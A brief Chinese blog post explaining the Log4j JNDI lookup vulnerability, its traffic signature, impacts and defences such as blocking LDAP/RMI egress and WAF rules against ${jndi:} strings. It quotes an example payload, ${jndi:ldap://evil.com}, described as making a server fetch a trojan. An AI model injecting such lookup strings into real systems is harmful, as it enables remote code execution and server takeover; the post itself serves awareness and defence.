log4j漏洞

log4j:是java的日志记录框架,用于把程序运行的各种信息写到控制台,文件,数据库或者远程服务中心
log4j:lookup功能,日志处理机制中动态资源加载功能被恶意的利用
流量特征:${ } 就像是一个“魔法咒语”,Log4j 看到它就会尝试执行里面的命令。
正常用法:${date} → 显示当前日期(无害)。
黑客用法:${jndi:ldap://evil.com} → 让服务器去黑客网站下载木马(危险!)
危害:远程控制服务器,获取敏感信息,被挖矿,作为跳板被横向,勒索
防御:封禁LDAP/RMI出站(网络隔离),改日志写法,避免日志直接拼接用户输入使用参数化查询,WAF规则           拦截${jndi:}及变种,防扫描和自动化攻击 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bigliuzi@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值